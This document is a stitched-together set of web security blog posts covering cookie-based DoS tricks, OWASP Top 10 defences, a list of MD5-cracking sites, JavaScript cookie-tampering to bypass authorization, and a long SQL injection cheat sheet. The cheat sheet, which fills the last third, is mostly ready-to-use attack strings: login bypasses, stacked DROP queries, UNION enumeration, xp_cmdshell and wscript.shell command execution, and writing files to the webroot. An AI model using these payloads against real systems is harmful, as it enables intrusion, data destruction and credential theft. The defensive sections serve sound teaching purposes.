Using Cookies For Selective DoS and State Detection: “

28 posts left….

This is a continuation of he first post where we described how you can use cookies to DoS certain portions of the website. After our speech one of the Mozilla guys came up to us and described another attack that arises from this. Let’s say when a user logs in it sets a cookie that is 200 bytes long, and when they log out it re-sets the same cookie to 50 bytes. Well if the attacker can set a cookie with a particular path to a single image on the site, for instance, they can use JavaScript to check with an onerror event handler to see if the image has loaded.

By combining the over-long cookie (minus 50 bytes) a logged in state will cause the image to fail to load, where as a logged out state will allow the image to load just fine. In this way an attacker can tell cookie states as long as the cookies are variable width and there aren’t other cookies muddying the waters. Interesting attack, I thought!

“

(Via ha.ckers.org web application security lab.)

Using Cookies For Selective DoS: “

29 posts left…

One of the things Josh Sokol and I talked about in our presentation at Blackhat was a way to use over-sized cookies to cause a DoS on the site. The web server sees the overlong cookie and stops the request from completing. This is not new and has certainly been discussed before. However, one thing that wasn’t discussed is that using the path an attacker can selectively cause the website to stop displaying portions of the site. For instance, if the attacker wants to shut down /javascript/ or /logout.aspx or /reportabuse.aspx or whatever, they can by setting an overly-long cookie for that particular path.

Setting cookies on the target sub domain would require something like header injection/Response splitting, XSS, or a MitM attack. It should be noted though that it doesn’t have to be on the target sub domain – it can be an exploit in another sub domain because cookies don’t follow the same origin policy if the cookie is scoped to the parent domain. In this way an attacker could turn off Clickjacking prevention code (deframing scripts), or turn off other client side protections or parts of the site that are bad from an attacker’s perspective. The only real solution to this is for all browsers to start making the absolute maximum size of cookies smaller than the smallest that web servers will allow (Apache was smaller than IIS by default for instance).

“

(Via ha.ckers.org web application security lab.)

Denial of Service (DoS) and distributed Denial of Service (DDoS) attacks involve an attempt to make a computer resource unavailable to its intended users. This may simply be for malicious purposes as is often the case when big commercial or famous web sites undergo a DDoS attack. However, it is also possible to exploit the system’s response to such an attack to break system firewalls, access virtual private networks, and to access other private resources. A DoS attack can also be used to affect a complete network or even a whole section of the Internet.

Commonly, attack involves simply saturating the target machine with external internet requests. In the case of a DDoS attack the perpetrator recruits other unwitting computers into a network and uses a multitude of machines to mount the attack. The result is that the resource, whether it is a website, an email server, or a database, cannot respond to legitimate traffic in a timely manner and so essentially becomes unavailable to users.

Methods for configuring a network to filter out known DoS attack software and to recognize some of the traffic patterns associated with a mounting DoS attack are available. However, current filters usually rely on the computer being attacked to check whether or not incoming information requests are legitimate or not. This consumes its resources and in the case of a massive DDoS can compound the problem.

Now, computer engineers John Wu, Tong Liu, Andy Huang, and David Irwin of Auburn University have devised a filter to protect systems against DoS attacks that circumvents this problem by developing a new passive protocol that must be in place at each end of the connection: user and resource.

Their protocol – Identity-Based Privacy-Protected Access Control Filter (IPACF) – blocks threats to the gatekeeping computers, the Authentication Servers (AS), and so allows legitimate users with valid passwords to access private resources.

The user’s computer has to present a filter value for the server to do a quick check. The filter value is a one-time secret that needs to be presented with the pseudo ID. The pseudo ID is also one-time use. Attackers cannot forge either of these values correctly and so attack packets are filtered out.

One potential drawback of the added layer of information transfer required for checking user requests is that it could add to the resources needed by the server. However, the researchers have tested how well IPACF copes in the face of a massive DDoS attacks simulated on a network consisting of 1000 nodes with 10 gigabits per second bandwidth. They found that the server suffers little degradation, negligible added information transfer delay (latency) and minimal extra processor usage even when the 10 Gbps pipe to the authentication server is filled with DoS packets. Indeed, the IPACF takes just 6 nanoseconds to reject a non-legitimate information packet associated with the DoS attack.

The Top 10 Web Application security vulnerabilities

This and the next series of blog entries will highlight the Top 10 most critical web application security vulnerabilities identified by the Open Web Application Security Project (OWASP).

You can use OWASP’s WebGoat to learn more about the OWASP Top Ten security vulnerabilties. WebGoat is an example web application, which has lessons showing “what not to do code”, how to exploit the code, and corrected code for each vulnerability.

You can use the OWASP Enterprise Security API Toolkit to protect against the OWASP Top Ten security vulnerabilties.

The ESAPI Swingset is a web application which demonstrates the many uses of the Enterprise Security API.

OWASP Top 10 number 1: XSS = Cross Site Scripting

Cross Site Scripting (XSS) is one of the most common security problems in today’s web applications. According to the SANS Top Cyber Security Risks, 60% of the total attack attempts observed on the Internet are against Web applications and SQL injection and Cross-Site Scripting account for more than 80% of the vulnerabilities being discovered. You are at risk of an XSS attack any time you put content that could contain scripts from someone un-trusted into your web pages.
There are 3 types of cross site scripting:

• Reflected XSS: is when an html page reflects user input data, e.g. from HTTP query parameters or a HTML form, back to the browser, without properly sanitizing the response. Below is an example of this in a servlet:

 out.writeln(“You searched for: “+request.getParameter(“query”);

• Stored XSS: is when an Attacker’s input script is stored on the server (eg a database) and later displayed in the web server html pages, without proper HTML filtering. Examples of this are in blogs, or forums where users can input data that will be displayed to others. Below is an example of this in a servlet data is retrieved from the database and returned in the HTML page without any validation:

out.writeln("<tr><td>" + guest.name + "<td>" + guest.comment);

• DOM XSS: is when JavaScript uses input data or data from the server to write dynamic HTML (DOM) elements, again without HTML sanitizing/escaping/filtering.

XSS can be used to:

• deface web pages
• hijack user sessions
• conduct phishing attacks
• execute malicious code in the context of the user’s session
• spread malware

Protecting against XSS

To protect against XSS all the parameters in the application should be validated and/or encoded before being output in HTML pages.

• Always validate on the server side for data integrity and security:
  • Validate all input data to the application:
  • Validate for type, format, length, range, and context before storing or displaying
  • Use white-listing (what is allowed), reject if invalid, instead of filtering out black-list (what is not allowed)
• Output encoding:
  • Explicitly set character encoding for all web pages (ISO-8859-1 or UTF 8):
    <%@ page contentType=”text/html;charset=ISO-8859-1″ language=”java” %>
  • all user supplied data should be HTML or XML entity encoded before rendering

Java specific Protecting against XSS

Validating Input with Java

• You can use Java regular expressions to validate input, this example from WebGoat allows whitespace, a-zA-Z_0-9, and the characters – and ,

String regex = "[\s\w-,]*";
Pattern pattern = Pattern.compile(regex);
validate(stringToValidate, pattern);

• Use Framework (Struts, JSF, Spring…) validators. With Java EE 6 you can use the Bean Validation Framework to centrally define validation constraints on model objects and with JSF 2.0 to extend model validation to the UI. For example here is a JSF 2.0 input field:

<h:inputText id="creditCard" value="#{booking.creditCardNumber}"/>

• Here is the JSF 2.0 booking Managed Bean using the Bean Validation Framework :

@ManagedBean
public class Booking {
 ...
 @NotNull(message = "Credit card number is required")
 @Size(min = 16, max = 16,
 message = "Credit card number must 16 digits long")
 @Pattern(regexp = "^\d*$",
 message = "Credit card number must be numeric")
 public String getCreditCardNumber() {
 return creditCardNumber;
 }
}

• In addition there are new JSF 2.0 Validators:
  • <f:validateBean> is a validator that delegates the validation of the local value to the Bean Validation API.
  • <f:validateRequired> provides required field validation.
  • <f:validateRegexp> provides regular expression-based validation
• Use the OWASP Enterprise Security API Java Toolkit’s Validator interface:

ESAPI.validator().getValidInput(String context,String input,String type,int maxLength,
   boolean allowNull,ValidationErrorList errorList)

• ESAPI.validator().getValidInput() returns canonicalized and validated input as a String. Invalid input will generate a descriptive ValidationErrorList, and input that is clearly an attack will generate a descriptive IntrusionException.

Output Encoding with Java

• You can use Struts output mechanisms such as <bean:write… >, or use the default JSTLescapeXML=”true” attribute in <c:out … >
• You can use the OWASP Enterprise Security API Java Toolkit’s ESAPI Encoder.encodeForHTML()method to encode data for use in HTML content. The encodeForHTML() method uses a “whitelist” HTML entity encoding algorithm to ensure that encoded data can not be interpreted as script. This call should be used to wrap any user input being rendered in HTML element content. For example:

Hello ,

below is some links to crack md5 password hashes online , i will keep this post updated with all online links for cracking md5.

http://gdataonline.com
http://md5.rednoize.com
http://ice.breaker.free.fr
http://www.milw0rm.com/md5/
http://shm.hard-core.pl/md5/
http://www.hashchecker.com
http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/
http://md5.benramsey.com
http://md5.altervista.org
http://shm.hard-core.pl
http://plain-text.info
http://www.passcracking.ru/
http://www.securitystats.com/tools/hashcrack.php
http://www.xmd5.org/index_en.htm

1. Cross site scripting (XSS)

The problem: The “most prevalent and pernicious” Web application security vulnerability, XSS flaws happen when an application sends user data to a Web browser without first validating or encoding the content. This lets hackers execute malicious scripts in a browser, letting them hijack user sessions, deface Web sites, insert hostile content and conduct phishing and malware attacks.

Attacks are usually executed with JavaScript, letting hackers manipulate any aspect of a page. In a worst-case scenario, a hacker could steal information and impersonate a user on a bank’s Web site, according to Snyder.

Real-world example: PayPal was targeted last year when attackers redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were redirected to a phishing site and prompted to enter PayPal login information, Social Security numbers and credit card details. PayPal said it closed the vulnerability in June 2006.

How to protect users: Use a whitelist to validate all incoming data, which rejects any data that’s not specified on the whitelist as being good. This approach is the opposite of blacklisting, which rejects only inputs known to be bad. Additionally, use appropriate encoding of all output data. “Validation allows the detection of attacks, and encoding prevents any successful script injection from running in the browser,” OWASP says.

2. Injection flaws

The problem: When user-supplied data is sent to interpreters as part of a command or query, hackers trick the interpreter — which interprets text-based commands — into executing unintended commands. “Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application,” OWASP writes. “In the worst-case scenario, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments.”

Real-world example: Russian hackers broke into a Rhode Island government Web site to steal credit card data in January 2006. Hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claims it was only 4,113.

How to protect users: Avoid using interpreters if possible. “If you must invoke an interpreter, the key method to avoid injections is the use of safe APIs, such as strongly typed parameterized queries and object relational mapping libraries,” OWASP writes.

3. Malicious file execution

The problem: Hackers can perform remote code execution, remote installation of rootkits, or completely compromise a system. Any type of Web application is vulnerable if it accepts filenames or files from users. The vulnerability may be most common with PHP, a widely used scripting language for Web development.

Real-world example: A teenage programmer discovered in 2002 that Guess.com was vulnerable to attacks that could steal more than 200,000 customer records from the Guess database, including names, credit card numbers and expiration dates. Guess agreed to upgrade its information security the next year after being investigated by the Federal Trade Commission.

How to protect users: Don’t use input supplied by users in any filename for server-based resources, such as images and script inclusions. Set firewall rules to prevent new connections to external Web sites and internal systems.

4. Insecure direct object reference

The problem: Attackers manipulate direct object references to gain unauthorized access to other objects. It happens when URLs or form parameters contain references to objects such as files, directories, database records or keys.

Banking Web sites commonly use a customer account number as the primary key, and may expose account numbers in the Web interface.

“References to database keys are frequently exposed,” OWASP writes. “An attacker can attack these parameters simply by guessing or searching for another valid key. Often, these are sequential in nature.”

Real-world example: An Australian Taxation Office site was hacked in 2000 by a user who changed a tax ID present in a URL to access details on 17,000 companies. The hacker e-mailed the 17,000 businesses to notify them of the security breach.

How to protect users: Use an index, indirect reference map or another indirect method to avoid exposure of direct object references. If you can’t avoid direct references, authorize Web site visitors before using them

5. Cross site request forgery

The problem: “Simple and devastating,” this attack takes control of victim’s browser when it is logged onto a Web site, and sends malicious requests to the Web application. Web sites are extremely vulnerable, partly because they tend to authorize requests based on session cookies or “remember me” functionality. Banks are potential targets.

“Ninety-nine percent of the applications on the Internet are susceptible to cross site request forgery,” Williams says. “Has there been an actual exploit where someone’s lost money? Probably the banks don’t even know. To the bank, all it looks like is a legitimate transaction from a logged-in user.”

Real-world example: A hacker known as Samy gained more than a million “friends” on MySpace.com with a worm in late 2005, automatically including the message “Samy is my hero” in thousands of MySpace pages. The attack itself may not have been that harmful, but it was said to demonstrate the power of combining cross site scripting with cross site request forgery. Another example that came to light one year ago exposed a Google vulnerability allowing outside sites to change a Google user’s language preferences.

How to protect users: Don’t rely on credentials or tokens automatically submitted by browsers. “The only solution is to use a custom token that the browser will not ‘remember,’” OWASP writes.

6. Information leakage and improper error handling

The problem: Error messages that applications generate and display to users are useful to hackers when they violate privacy or unintentionally leak information about the program’s configuration and internal workings.

“Web applications will often leak information about their internal state through detailed or debug error messages. Often, this information can be leveraged to launch or even automate more powerful attacks,” OWASP says.

Real-world example: Information leakage goes well beyond error handling, applying also to breaches occurring when confidential data is left in plain sight. The ChoicePoint debacle in early 2005 thus falls somewhere in this category. The records of 163,000 consumers were compromised after criminals pretending to be legitimate ChoicePoint customers sought details about individuals listed in the company’s database of personal information. ChoicePoint subsequently limited its sales of information products containing sensitive data.

How to protect users: Use a testing tool such as OWASP’S WebScarab Project to see what errors your application generates. “Applications that have not been tested in this way will almost certainly generate unexpected error output,” OWASP writes.

7. Broken authentication and session management

The problem: User and administrative accounts can be hijacked when applications fail to protect credentials and session tokens from beginning to end. Watch out for privacy violations and the undermining of authorization and accountability controls.

“Flaws in the main authentication mechanism are not uncommon, but weaknesses are more often introduced through ancillary authentication functions such as logout, password management, timeout, remember me, secret question and account update,” OWASP writes.

Real-world example: Microsoft had to eliminate a vulnerability in Hotmail that could have let malicious JavaScript programmers steal user passwords in 2002. Revealed by a networking products reseller, the flaw was vulnerable to e-mails containing Trojans that altered the Hotmail user interface, forcing users to repeatedly reenter their passwords and unwittingly send them to hackers.

How to protect users: Communication and credential storage has to be secure. The SSL protocol for transmitting private documents should be the only option for authenticated parts of the application, and credentials should be stored in hashed or encrypted form.

Another tip: get rid of custom cookies used for authentication or session management.

8. Insecure cryptographic storage

The problem: Many Web developers fail to encrypt sensitive data in storage, even though cryptography is a key part of most Web applications. Even when encryption is present, it’s often poorly designed, using inappropriate ciphers.

“These flaws can lead to disclosure of sensitive data and compliance violations,” OWASP writes.

Real-world example: The TJX data breach that exposed 45.7 million credit and debit card numbers. A Canadian government investigation faulted TJX for failing to upgrade its data encryption system before it was targeted by electronic eavesdropping starting in July 2005.
How to protect users: Don’t invent your own cryptographic algorithms. “Only use approved public algorithms such as AES, RSA public key cryptography, and SHA-256 or better for hashing,” OWASP advises.

Furthermore, generate keys offline, and never transmit private keys over insecure channels.

9. Insecure communications

The problem: Similar to No. 8, this is a failure to encrypt network traffic when it’s necessary to protect sensitive communications. Attackers can access unprotected conversations, including transmissions of credentials and sensitive information. For this reason, PCI standards require encryption of credit card information transmitted over the Internet.

Real-world example: TJX again. Investigators believe hackers used a telescope-shaped antenna and laptop computer to steal data exchanged wirelessly between portable price-checking devices, cash registers and store computers, the Wall Street Journal reported.

“The $17.4-billion retailer’s wireless network had less security than many people have on their home networks,” the Journal wrote. TJX was using the WEP encoding system, rather than the more robust WPA.

How to protect users: Use SSL on any authenticated connection or during the transmission of sensitive data, such as user credentials, credit card details, health records and other private information. SSL or a similar encryption protocol should also be applied to client, partner, staff and administrative access to online systems. Use transport layer security or protocol level encryption to protect communications between parts of your infrastructure, such as Web servers and database systems.

10. Failure to restrict URL access

The problem: Some Web pages are supposed to be restricted to a small subset of privileged users, such as administrators. Yet often there’s no real protection of these pages, and hackers can find the URLs by making educated guesses. Say a URL refers to an ID number such as “123456.” A hacker might say ‘I wonder what’s in 123457?’ Williams says.

The attacks targeting this vulnerability are called forced browsing, “which encompasses guessing links and brute force techniques to find unprotected pages,” OWASP says.

Real-world example: A hole on the Macworld Conference & Expo Web site this year let users get “Platinum” passes worth nearly $1,700 and special access to a Steve Jobs keynote speech, all for free. The flaw was code that evaluated privileges on the client but not on the server, letting people grab free passes via JavaScript on the browser, rather than the server.

How to protect users: Don’t assume users will be unaware of hidden URLs. All URLs and business functions should be protected by an effective access control mechanism that verifies the user’s role and privileges. “Make sure this is done … every step of the way, not just once towards the beginning of any multi-step process,’ OWASP advises.

JavaScript Injection Overview
JavaScript is a widely used technology within websites and web based applications. JavaScript can be used for all sorts of useful things and functions. But along with this comes some additional security issues that need to be thought of and tested for. JavaScript can be used not only for good purposes, but also for malicious purposes.

Using JavaScript an individual can modify and change existing information within a form. It can be used not only to change form input tags, but also the cookie’s that are currently set in the browser, and any other value within a website or web application. Any type of parameter manipulation that you want to perform can typically be done with Javascript injection.

To execute any javascript within a current session, a user would enter the specific javascript commands within the browser’s url bar minus the http://. All javascript commands must start with the javascript: tag followed by any javascript command that will be executed. All javascript is ended with a ; so a user could enter multiple javascript commands, as long as each command ended with the ;

JavaScript cookie modification
Using JavaScript a user can modify the current cookie settings. This can be performed with some basic JavaScript commands. To view the current contents of your current cookie/s, use the following JavaScript command.

javascript:alert(document.cookie);

This command will popup a box which lists your current cookies. A malicious user could use this to change values in the cookie. For example lets say a web application you are testing sets an authorization cookie to true when a user has successfully logged in and passed the authorization test. To change the values within the cookie, a malicious user would execute javascript like the following from the url bar within the browser.

javascript:void(document.cookie="authorization=true");

This would cause the current cookie parameter authorization=false to be changed to authorization=true. Which the malicious user might not have passed the original authorization test. The malicious user has just bypassed the authorization test and gained access to the sensitive content. As you could imagine, this could cause severe problems in privilege escalation, if the malicious user could use JavaScript injection to bypass the correct authorization process.

If you are testing for JavaScript injection and wish to see if the cookie has been altered you would execute a command simiar to the following, except you would want to replace the cookie name and value with the cookie you desire to test. Start with the javascript command to alter the cookie and then tack on the javascript alert function to view what the cookie was changed to. For example

javascript:void(document.cookie="authorization=true");javascript:alert(document.cookie);

JavaScript HTML Form modification
You can also use javascript to modify any value with an html form, including hidden forms, and disabled forms. The following is an example of how you would set an input tag named email within form number 0 (or the first form on the page)

javascript:void(document.forms[0].email.value="test@test.com");

How to protect against Javascript Injection
Always validate the input received against a whitelist. If you use a blacklist you could and probably will come up against encoding issues. Always use a whitelist when validating input.

Do not rely on client side validation to validate the user input. Client side validation is great for helping the user input correct data. But a malicious user will not use this and could bypass the client side validation. Client side validate is should never be considered as a security fix. Using javascript to validate input should not be used. As you can see javascript is very easy to change and modify on any html page.

Additionally validate the input everytime, not just when the data is initally accepted. For example if you set a cookie, make sure that cookie is the same value and it is correct on each and every request. A malicious user could modify and change the value anytime during the session.

Injecting javascript into existing pages
Not only can you use javascript to manipulate parameters, cookies, but you can also inject javascript into dynamic pages to cause the page to render differently, do something else, or some other malicious thing. Think of a XSS attack.

Come back soon and we will post some examples of this.

Using JavaScript is difficult. Isn’t there an easier way?
Actually there is an easier way to test for any type of parameter manipulation you can do with javascript injection. Using sometype of proxy that allows you to manipulate parameters on the fly is much easier. You can do this with a number of different applications. I’ve included a list of some of the proxy applications that allow you to do this.

* Paros Proxy
* TamperData

There are many, many more security testing proxy tools, this is just a short list of a few of the quick, easy, and nice tools to use.

Paros Proxy
Paros is a valuable testing tool for your security and vulnerability testing. Paros can be used to spider/crawl your entire site, and then execute canned vulnerability scanner tests. But Paros goes beyond that, it comes with a built in utility that can proxy traffic. This Paros Proxy utility can be used to tamper or manipulate any http or https traffic on the fly. This makes some of the more interesting security types of testing. It will help you isolate potential area’s of security concern and then manual attempt to perform the type of testing you desire.

Paros also comes with a built in Session ID analyzer. It will display a graph of all the types of Session ID’s it has been presented with using a multiple threaded session initiater. You then can determine if the graph appears random enough for the Session ID. It is a pretty unique and interesting tool to use. Although typically most developers will rely upon another technology tomcat, apache, or some other application to generate Session ID’s. This is not always the case and as such a Session ID analysis should be performed. Sometimes the Session ID will not be randomized enough and the hash used to create the Session ID is easily predictable.

Paros also comes with a built in Fuzzer. You will need to generate your own Fuzzer library to use the Fuzzer, but it will perform all the fuzzing for you.
http://www.parosproxy.org/index.shtml

TamperData
TamperData is an extension for Mozilla Firefox. You can use TamperData to halt the traffic http requests that are processing and to “Tamper”, change, modify any of the data that is being submitted to the website.

TamperData is easily installed within your Firefox browser and is extremely easy to use. It only takes a moment to install and become familiar with the way it works.

The one thing that I haven’t figured out to do with TamperData, is to modify HTTP GET parameters, I can see how to modify the HTTP headers, post parameters, but the GET parameters are a bit more misleading to me.

All in all TamperData is an easy, excellent way to see what your web application is doing, and start testing with different and various other types of data. Parameter manipulation is very easy to do, there is no need to use Javascript Injection or re-posting webpages. This is a much easier way to just tamper with the data as it is being submitted to the web application.
http://tamperdata.mozdev.org/

Currently only for MySQL and Microsoft SQL Server. Most of the samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and SQL sentences.

Samples are provided to allow reader to get basic idea of a potential attack.

* M : MySQL
* S : SQL Server
* O : Oracle
* + : Possibly all other databases

Examples;
(MS) MySQL and SQL Server etc.
(M*S) Only in some versions of MySQL or special conditions see related note and SQL Server
Syntax Reference with Sample Basic Attacks
Ending / Commenting Out / Line Comments Queries
Line Comments

(Comments rest of the query)

Line comments are generally useful for ignoring rest of the query so you don¡¯t have to deal with fixing rest of the query.

* — (SM)
DROP sampletable;–

* # (M)
DROP sampletable;#

Sample SQL Injection Attacks

* Username: admin’–
* SELECT * FROM members WHERE username = ‘admin’–’ AND password = ‘password’
This is going to log you as admin user, because rest of the SQL query will be ignored.

Inline Comments

Comments rest of the query by not closing them or use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.

* /*Comment Here*/ (SM)
o DROP/*comment*/sampletable
o DR/**/OP/*bypass blacklisting*/sampletable
o SELECT/*avoid-spaces*/password/**/FROM/**/Members

* /*! MYSQL Special SQL */ (M)
This is a special comment syntax for MySQL. It¡¯s perfect for detecting MySQL version. If you put a code into this comments it¡¯s going to execute in MySQL. Also you can use this to execute some code only if the server is higher than supplied version.

SELECT /*!32302 1/0, */ 1 FROM tablename

Sample SQL Injection Attacks

* ID: /*!32302 10*/
* ID: 10
You will get the same response if the MySQL version is higher than 3.23.02

Stacking Queries

Executing more than one query in one transaction. This is very useful in every injection point, especially in SQL Server back ended applications.

* ; (S)
SELECT * FROM members; DROP members–

Ends a query and starts a new one.

*About MySQL and PHP;
To clarify some issues;
PHP – MySQL doesn’t support stacked queries, Java doesn’t support stacked queries (I’m sure for ORACLE, not quite sure about other databases). Normally MySQL supports stacked queries but because of database layer in most of the configurations it¡¯s not possible to execute second query in PHP-MySQL applications or maybe MySQL clients support this, not quite sure. Can someone clarify ?
Sample SQL Injection Attacks

* ID: 10;DROP members –
* SELECT * FROM products WHERE id = 10; DROP members–

This will run DROP members SQL sentence after normal SQL Query.
If Statements

Get response based on a if statement is one of the key points of Blind SQL Injection and can be very useful to test simple stuff.
MySQL If Statement

* IF(condition,true-part,false-part) (M)
SELECT IF(1=1,’true’,'false’)

SQL Server If Statement

* IF contidion true-part ELSE false-part (S)
IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’

Sample SQL Injection Attacks

if ((select user) = ‘sa’ OR (select user) = ‘dbo’) select 1 else select 1/0 (S)
This will throw an divide by zero error if current logged user is not “sa” or “dbo”.
Using Integers

Very useful for bypassing, magic_quotes() and similar filters, or even WAFs.

* 0xHEXNUMBER (SM)
You can write hex like these;

SELECT CHAR(0×66) (S)
SELECT 0×5045 (this is not an integer it will be a string from Hex) (M)
SELECT 0×50 + 0×45 (this is integer now!) (M)

String Operations

String related operations. This can be quite useful to build up injection which are not using any quotes, bypass any other black listing or determine database.
String Concatenation

* + (S)
SELECT login + ‘-’ + password FROM members

* || (*MO)
SELECT login || ‘-’ || password FROM members

*About MySQL `||`;
If MySQL is running in ANSI mode it¡¯s going to work but otherwise MySQL accept it as `logical operator` it¡¯ll return 0. Better way to do it is using CONCAT() function in MySQL.

* CONCAT(str1, str2, str3, …) (M)
Concatenate supplied strings.
SELECT CONCAT(login, password) FROM members

Strings without Quotes

These are some direct ways to using strings but it¡¯s always possible to use CHAR()(MS) and CONCAT()(M) to generate string without quotes.

* 0×457578 (M) – Hex Representation of string
SELECT 0×457578
This will be selected as string in MySQL.

* Using CONCAT() in MySQL
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)
This will return ¡®KLM¡¯.

* SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)
This will return ¡®KLM¡¯.

String Modification & Related

* ASCII() (SM)
Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections.

SELECT ASCII(‘a’)

* CHAR() (SM)
Convert an integer of ASCII .

SELECT CHAR(64)

UNION ¨C Fixing Language Issues

While exploiting union injections sometimes you will get errors because of different language settings (table settings, field settings, combined table / db settings etc.) these functions are quite useful to bypass this problem. It’s rare but if you dealing with Japanese, Russian, Turkish etc. applications then you will see it.

* SQL Server (S)
Use field COLLATE SQL_Latin1_General_Cp1254_CS_AS or some other valid one – check out SQL Server documentation.

* MySQL (M)
Hex() for every possible issue

Login Screen (SMO+)
SQL Injection 101, Login tricks

* admin’ –
* admin’ #
* admin’/*
* ‘ or 1=1–
* ‘ or 1=1#
* ‘ or 1=1/*
* ‘) or ’1′=’1–
* ‘) or (’1′=’1–
* etc….

* Login as different user (SM*)
‘ UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1–

*Old versions of MySQL doesn’t support union queries
Error Based – Find Columns Names
Finding Column Names with HAVING BY – Error Based (S)

In the same order,

* ‘ HAVING 1=1 –
* ‘ GROUP BY table.columnfromerror1 HAVING 1=1 –
* ‘ GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 –
* ‘ GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 — and so on
* If you are not getting any more error then it’s done.

Finding how many columns in SELECT query by ORDER BY (MSO+)

Finding column number by ORDER BY can speed up the UNION SQL Injection process.

* ORDER BY 1–
* ORDER BY 2–
* ORDER BY N– so on
* Keep going until get an error. Error means you found the number of selected columns.

Data types, UNION, etc.
Hints,

* Always use UNION with ALL because of image similiar non-distinct field types. By default union tries to get records with distinct.
* To get rid of unrequired records from left table use -1 or any not exist record search in the beginning of query (if injection is in WHERE). This can be critical if you are only getting one result at a time.
* Use NULL in UNION injections for most data type instead of trying to guess string, date, integer etc.
o Be careful in Blind situtaions may you can understand error is coming from DB or application itself. Because languages like ASP.NET generally throws errors while trying to use NULL values (because normally developers are not expecting to see NULL in a username field)

Finding Column Type

* ‘ union select sum(columntofind) from users– (S)
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.

If you are not getting error it means column is numeric.

* Also you can use CAST() or CONVERT()
o SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL–

* 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 ¨C-
No Error – Syntax is right. MS SQL Server Used. Proceeding.

* 11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 ¨C-
No Error ¨C First column is an integer.

* 11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 –
Error! ¨C Second column is not an integer.

* 11223344) UNION SELECT 1,¡¯2¡¯,NULL,NULL WHERE 1=2 ¨C-
No Error ¨C Second column is a string.

* 11223344) UNION SELECT 1,¡¯2¡¯,3,NULL WHERE 1=2 ¨C-
Error! ¨C Third column is not an integer. …

Microsoft OLE DB Provider for SQL Server error ’80040e07′
Explicit conversion from data type int to image is not allowed.

You¡¯ll get convert() errors before union target errors ! So start with convert() then union
Simple Insert (MSO+)
‘; insert into users values( 666, ‘attacker’, ‘foobar’, 0xffff )–
Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes

@@version (MS)
Version of database and more details for SQL Server. It’s a constant. You can just select it like any other column, you don’t need to supply table name. Also you can use insert, update statements or in functions.

INSERT INTO members(id, user, pass) VALUES(1, ”+SUBSTRING(@@version,1,10) ,10)
Bulk Insert (S)

Insert a file content to a table. If you don’t know internal path of web application you can read IIS (IIS 6 only) metabase file (%systemroot%system32inetsrvMetaBase.xml) and then search in it to identify application path.

1. Create table foo( line varchar(8000) )
2. bulk insert foo from ‘c:inetpubwwwrootlogin.asp’
3. Drop temp table, and repeat for another file.

BCP (S)

Write text file. Login Credentials are required to use this function.
bcp “SELECT * FROM test..foo” queryout c:inetpubwwwrootruncommand.asp -c -Slocalhost -Usa -Pfoobar
VBS, WSH in SQL Server (S)

You can use VBS, WSH scripting in SQL Server because of ActiveX support.

declare @o int
exec sp_oacreate ‘wscript.shell’, @o out
exec sp_oamethod @o, ‘run’, NULL, ‘notepad.exe’
Username: ‘; declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL, ‘notepad.exe’ –
Executing system commands, xp_cmdshell (S)

Well known trick, By default it’s disabled in SQL Server 2005. You need to have admin access.

EXEC master.dbo.xp_cmdshell ‘cmd.exe dir c:’

Simple ping check (configure your firewall or sniffer to identify request before launch it),

EXEC master.dbo.xp_cmdshell ‘ping <ip address>’

You can not read results directly from error or union or something else.
Some Special Tables in SQL Server (S)

* Error Messages
master..sysmessages

* Linked Servers
master..sysservers

* Password (2000 and 20005 both can be crackable, they use very similar hashing algorithm )
SQL Server 2000: masters..sysxlogins
SQL Server 2005 : sys.sql_logins

More Stored Procedures (S)
Stored Procedures

1. Cmd Execute (xp_cmdshell)
exec master..xp_cmdshell ‘dir’

2. Registry Stuff (xp_regread)
1. xp_regaddmultistring
2. xp_regdeletekey
3. xp_regdeletevalue
4. xp_regenumkeys
5. xp_regenumvalues
6. xp_regread
7. xp_regremovemultistring
8. xp_regwrite
exec xp_regread HKEY_LOCAL_MACHINE, ‘SYSTEMCurrentControlSetServiceslanmanserverparame ters’, ‘nullsessionshares’
exec xp_regenumvalues HKEY_LOCAL_MACHINE, ‘SYSTEMCurrentControlSetServicessnmpparametersvali dcommunities’

3. Managing Services (xp_servicecontrol)
4. Medias (xp_availablemedia)
5. ODBC Resources (xp_enumdsn)
6. Login mode (xp_loginconfig)
7. Creating Cab Files (xp_makecab)
8. Domain Enumeration (xp_ntsec_enumdomains)
9. Process Killing (need PID) (xp_terminate_process)
10. Add new procedure (virtually you can execute whatever you want)
sp_addextendedproc ¡®xp_webserver¡¯, ¡®c:tempx.dll¡¯
exec xp_webserver
11. Write text file to a UNC or an internal path (sp_makewebtask)

MSSQL Bulk Notes

SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/

DECLARE @result int; EXEC @result = xp_cmdshell ‘dir *.exe’;IF (@result = 0) SELECT 0 ELSE SELECT 1/0

HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)

INSERT tbl EXEC master..xp_cmdshell OSQL /Q”DBCC SHOWCONTIG”

OPENROWSET (Transact-SQL) – http://msdn2.microsoft.com/en-us/library/ms190312.aspx

You can not use sub selects in SQL Server Insert queries.
